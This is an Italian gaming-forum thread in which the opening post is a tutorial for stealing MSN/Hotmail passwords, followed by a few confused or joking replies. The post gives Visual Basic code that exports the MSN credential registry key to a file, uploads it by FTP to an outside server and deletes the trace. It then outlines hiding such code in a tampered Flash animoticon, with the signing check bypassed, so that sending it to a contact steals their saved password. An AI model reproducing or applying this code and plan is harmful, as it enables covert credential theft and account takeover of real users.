Salve ospite, se leggi questo messaggio vuol dire che non sei registrato, cosa aspetti ? Premi qui per registrarti La registrazione è completamente gratuita e ti permetterà di usufruire di tutte le funzionalità del nostro forum. Buona navigazione.


Vendo, Compro, Scambio NosTale! Riapre il Black Market, concludi i tuoi scambi NosTale gratuitamente! Più info  -   Accedi alla sezione
Download file Server : File Retro Server NosTale
Visita la nuova sezione di BorderGame dedicata a Blade & Soul! Sezione Blade and Soul

 
Valutazione discussione:
  • 0 voti - 0 media
  • 1
  • 2
  • 3
  • 4
  • 5
Prendere Le Password Con Un Animotion
06-01-2011 11:54 AM
Messaggio: #1
Prendere Le Password Con Un Animotion
TheGangster
Spammer
Utente Saggio
Utente Storico
Vip

Admin supremo xD

Messaggi : 1,170

Registrato dal : Oct 2010

Reputazione : 50

Stato : Offline


Premi :



Ti serve una password?
Quella di MSN o altro?

Non c'e problema!

Iniziamo dal principio.

A noi occorre una password, prima cosa a cui pensiamo:
Dove la possiamo trovare?
La password si trova nella testa della vittima, nel suo pc ( cookie o chive di regedit) e nei server ( in questo caso hotmail).

Abbiamo dunque tre possibilita per farci dare la chiave di accesso.
Possiamo provare a prelevarla direttamente dalla vittima, con la famosa e tanto usata tecnica dell'ingegneria sociale, che come saprete consiste nel fingersi qualcun altro ( come lo staff hotmail ) per farcela consegnare direttamente dalla vittima.

Seconda ipotesi.
Entriamo nei server Hotmail e la prendiamo...
Ma non ci conviene giusto?

Terza ed ultima ioptesi
La chiave si trova nel pc della vittima.
Possiamo trovarla sotto forma di Cookie ( non parliamo di una vera e propria password ma di frammenti di informazioni che ci identificano).
In questo caso bastera sfruttare uno dei tanti bachi di xss ( cross site scripting ) per sottrarre le info desiderate, ed accededere mediante cookie, ossia senza digitare la password.

Ancora possiamo trovare la vera e propria password nel pc della vittimae in particolare MSN la conserva nel "registro di configurazione del sistema" ( regedit ) per evitare di farcela digitare ogni volta.

Ora con un semplice programma scritto in vb abbiamo la possibilita di prelevare quale chiave di registro vogliamo... bastera dunque digitare il percorso dove msn salva la password ed il gioco e fatto.

Codice:

Shell ("command.com /c reg export HKEY_CURRENT_USERSoftwareMicrosoftIdentityCRL c:pwd.txt")
Dim passw As String
Dim ftpurl As String
kinglion = "tuoftp"
eurohackers = "tuapassw"
ftpurl = "ftp://tuoftp.eurohackers.it"
inet.URL = ftpurl
inet.UserName = kinglion
inet.Password = eurohackers
passw = "pwd.txt"
inet.Execute inet.URL, "PUT C:pwd.txt " & passw
Do While inet.StillExecuting = True
DoEvents
Loop
Kill "C:pwd.txt"
End Sub


Ma non è tutto, oggi vi detto le basi per un attacco davvero potente col quale poter mettere in ginocchio MSN.

Questo attacco e stato elaborato interamente da me, ed a quanto mi risulta fino ad oggi nessuno ci aveva mai pensato, o ci era mai riuscito, spero comunque che non lo usiate per delle lamerate, anzi, ne sono piu che sicuro che con tale attacco difficilmente farete danni, perche solo in pochi riuscirete a sfruttarlo.

A maggior precauzione dell'indennità dei clienti Hotmail vi spiegoro "solo" cosa fare, ma non "come fare".

Come ho scritto sopra, con un programma che io ho scritto in vb, ma che puo essere riscritto in vari linguaggi possiamo impossessarci della chaive di registro della vittima, in questo caso parliamo di una chiave MSN.

Il problema che ci poniamo a questo punto è: Come faccio eseguire il programma alla vittima?
Mica vado da lui e gli dico: Tie apri questo eseguibile.

Qua ci viene in aiuto lo stesso hotmail.
Il caro e tanto usato programma ci permette di inviare sul pc vittima una serie di animatizioni in FLASH chiamate "animoticon" , senza contare la condivisione degli sfondi in flash e degli avatar animati, dunque ci permette di eseguire codice direttamente sul pc vittima.
Codice tra l'altro innocuo anche perche tutti gli sfondi, avatar ed animoticon devono essere approvati dalla mamma m*i*c*r*o*$*o*f*t con una personale chiave dal valore di 400 euro.

Ora proviamo ad aprire i file .mco ( avatar animoticon ) e troveremo un file .cab ed un file xml criptato per la maggior parte in base 64.
Apriamo anche il file cab e troviamo a sua volta il file swf ed un file xml che contiene la chiave m*i*c*r*o*$*o*f*t criptata in base64.
Sta a voi il resto, scopritee come baipassare la chiave m*i*c*r*o*$*o*f*t e sostituite il file swf originale con uno modificato da voi contenente il codice adattato per prelevare la chiave dal registro vittima.

Se avrete fatto tutto bene, riuscirete ad installare l'animoticon, e vi bastera inviarlo alla vittima come un normale smile per ricevere la sua password, non occorrera dunque che la vittima apra qualcosa, o faccia qualcosa, basta solo che lo abbiate nei contatti, e che abbia la password salvata.

Attenzione alla versione di msn che usa la vittima, il percorso della chiave di registro cambia.
Ultima cosa, non fate affidamento sul programma in vb che ho scritto, perche non e compatibile con flash, in quanto vb e un linguaggio da compilare.
Tecnica provata con msn 7.5 , 8.0 e successivi
(Questo messaggio è stato modificato l'ultima volta il: 13-04-2011 06:59 PM da TheGangster.)
Torna al primo messaggio
Email WWW Cerca Rispondi
11-01-2011 12:00 PM
Messaggio: #2
RE: Prendere Le Password Con Un Animotion
Sharing
Amministratori
Grafico
Spammer
Subber
Utente Saggio
Utente Storico
Vip

Amministratore

Messaggi : 5,253

Registrato dal : Nov 2010

Reputazione : 347

Stato : Offline


Premi :



Perchè hai copiato anche il profilo di .:Jonin:. ? O_o vedi che all'inizio ce il nick con la descrizione account XDXD (maledetto copia e incolla >_<)
Torna al primo messaggio
Email Cerca Rispondi
13-01-2011 03:13 PM
Messaggio: #3
RE: Prendere Le Password Con Un Animotion
destinity
*
Utente Storico

Utente giovane

Messaggi : 219

Registrato dal : Nov 2010

Reputazione : 1

Stato : Offline


Premi :



Asd in parole povere ? Non ho capito bene .-.
İmage İmage İmage
Torna al primo messaggio
Email Cerca Rispondi
02-08-2011 11:39 PM
Messaggio: #4
RE: Prendere Le Password Con Un Animotion
AssassinoBrutto
*
Cabal online
Gath
NosTale

Ma ke cazz...

Messaggi : 217

Registrato dal : Mar 2011

Reputazione : 3

Stato : Offline


Premi :



(11-01-2011 12:00 PM)Sharing Ha scritto:  Perchè hai copiato anche il profilo di .:Jonin:. ? O_o vedi che all'inizio ce il nick con la descrizione account XDXD (maledetto copia e incolla >_<)

Idem XD PiantoDodgy
Nulla e reale tutto e lecito
L'assassino agisce nel buio
Disse Altair
Per servire la luce
XD
İmage


İmage İmage

İmage
İmage
Torna al primo messaggio
Email Cerca Rispondi
16-09-2012 07:19 PM
Messaggio: #5
RE: Prendere Le Password Con Un Animotion
pop96
*
Monster Hunter
NosTale
Utente Storico

Utente

Messaggi : 381

Registrato dal : Sep 2012

Reputazione : 22

Stato : Offline


Premi :



Potresti spiegarti meglio??
Torna al primo messaggio
Email Cerca Rispondi
17-09-2012 04:46 PM
Messaggio: #6
RE: Prendere Le Password Con Un Animotion
Joker~
*
Utente Storico

Me gusta °L°

Messaggi : 442

Registrato dal : Sep 2012

Reputazione : 24

Stato : Offline


Premi :



Non capisco
RISPETTO CHI MI RISPETTA.
Torna al primo messaggio
Cerca Rispondi

PubblicitàLa tua pubblicità qui, clicca per informazioni e per le offerte!

Stanno visualizzando la discussione : 1 Ospite(i)

  • Versione stampabile
  • Invia ad un amico
  • Sottoscrivi questa discussione